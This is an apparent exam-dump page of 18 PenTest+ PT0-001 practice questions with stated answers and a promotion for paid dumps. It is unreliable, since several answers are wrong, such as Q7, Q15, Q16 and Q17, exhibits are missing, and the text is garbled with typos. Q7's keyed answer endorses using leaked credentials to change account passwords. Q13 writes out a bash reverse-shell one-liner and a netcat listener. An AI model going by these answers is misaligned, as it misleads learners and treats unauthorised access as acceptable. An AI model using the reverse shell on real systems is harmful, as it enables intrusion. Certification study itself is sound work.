PT0-001 Study Guides are updated and PT0-001 Study Guides are verified by experts. Once you have completely prepared with our PT0-001 Dumps you will be ready for the real PT0-001 exam without a problem. We have PT0-001 Exam Questions. PASSED PT0-001 Dumps Questions First attempt! Here What I Did.

Online PT0-001 free questions and answers of New Version:

NEW QUESTION 1
Click the exhibit button.
PT0-001 dumps exhibit
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network Which of the following types of attacks should the tester stop?

  • A. SNMP brute forcing
  • B. ARP spoofing
  • C. DNS cache poisoning
  • D. SMTP relay

Answer: B

NEW QUESTION 2
Which of the following BEST explains why it is important to maintain confidentiality of any identified findings when performing a penetration test?

  • A. Penetration test findings often contain company intellectual property
  • B. Penetration test findings could lead to consumer dissatisfaction if made pubic
  • C. Penetration test findings are legal documents containing privileged information
  • D. Penetration test findings can assist an attacker in compromising a system

Answer: C

NEW QUESTION 3
Given the following Python script:
PT0-001 dumps exhibit
Which of the following actions will it perform?

  • A. ARP spoofing
  • B. Port scanner
  • C. Reverse shell
  • D. Banner grabbing

Answer: A

NEW QUESTION 4
Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

  • A. Badge cloning
  • B. Lock picking
  • C. Tailgating
  • D. Piggybacking

Answer: A

NEW QUESTION 5
A software development team recently migrated to new application software on the on-premises environment Penetration test findings show that multiple vulnerabilities exist If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM Which of the following is MOST important for confirmation?

  • A. Unsecure service and protocol configuration
  • B. Running SMB and SMTP service
  • C. Weak password complexity and user account
  • D. Misconfiguration

Answer: A

NEW QUESTION 6
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to explogt this configuration setting?

  • A. Use path modification to escape the application's framework.
  • B. Create a frame that overlays the application.
  • C. Inject a malicious iframe containing JavaScript.
  • D. Pass an iframe attribute that is maliciou

Answer: B

NEW QUESTION 7
A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?

  • A. Document Ihe findtngs with an executive summary, recommendations, and screenshots of the web apphcation disclosure.
  • B. Connect to the SQL server using this information and change the password to one or two noncritical accounts to demonstrate a proof-of-concept to management.
  • C. Notify the development team of the discovery and suggest that input validation be implementedon the web application's SQL query strings.
  • D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.

Answer: B

NEW QUESTION 8
The following command is run on a Linux file system: Chmod 4111 /usr/bin/sudo
Which of the following issues may be explogted now?

  • A. Kernel vulnerabilities
  • B. Sticky bits
  • C. Unquoted service path
  • D. Misconfigured sudo

Answer: D

NEW QUESTION 9
Click the exhibit button.
PT0-001 dumps exhibit
Given the Nikto vulnerability scan output shown in the exhibit, which of the following explogtation techniques might be used to explogt the target system? (Select TWO)

  • A. Arbitrary code execution
  • B. Session hijacking
  • C. SQL injection
  • D. Login credential brute-forcing
  • E. Cross-site request forgery

Answer: CE

NEW QUESTION 10
A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

  • A. TCP SYN flood
  • B. SQL injection
  • C. xss
  • D. XMAS scan

Answer: A

NEW QUESTION 11
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
A)
PT0-001 dumps exhibit
B)
PT0-001 dumps exhibit
C)
PT0-001 dumps exhibit
D)
PT0-001 dumps exhibit

  • A. Option A
  • B. Option B
  • C. Option C
  • D. Option D

Answer: D

NEW QUESTION 12
If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8
Which of the following formats is the correct hash type?

  • A. Kerberos
  • B. NetNTLMvl
  • C. NTLM
  • D. SHA-1

Answer: C

NEW QUESTION 13
A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0>&1
Which of the following additional commands would need to be executed on the tester's Linux system.o make (he pre*ous command success?

  • A. nc -nvlp 443
  • B. nc 10.2.4.6 443
  • C. nc -w3 10.2.4.6 443
  • D. nc-/bin/ah 10.2.4.6 443

Answer: A

NEW QUESTION 14
Which of the following has a direct and significant impact on the budget of the security assessment?

  • A. Scoping
  • B. Scheduling
  • C. Compliance requirement
  • D. Target risk

Answer: A

NEW QUESTION 15
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
• Code review
• Updates to firewall setting

  • A. Scope creep
  • B. Post-mortem review
  • C. Risk acceptance
  • D. Threat prevention

Answer: C

NEW QUESTION 16
A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode. Which of the following steps must the firm take before it can run a static code analyzer?

  • A. Run the application through a dynamic code analyzer.
  • B. Employ a fuzzing utility.
  • C. Decompile the application.
  • D. Check memory allocation

Answer: D

NEW QUESTION 17
Which of the following CPU register does the penetration tester need to overwrite in order to explogt a simple butter overflow?

  • A. Stack pointer register
  • B. Index pointer register
  • C. Stack base pointer
  • D. Destination index register

Answer: D

NEW QUESTION 18
A penetration tester successfully explogts a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
PT0-001 dumps exhibit

  • A. Option A
  • B. Option B
  • C. Option C
  • D. Option D

Answer: D

Thanks for reading the newest PT0-001 exam dumps! We recommend you to try the PREMIUM Surepassexam PT0-001 dumps in VCE and PDF here: https://www.surepassexam.com/PT0-001-exam-dumps.html (131 Q&As Dumps)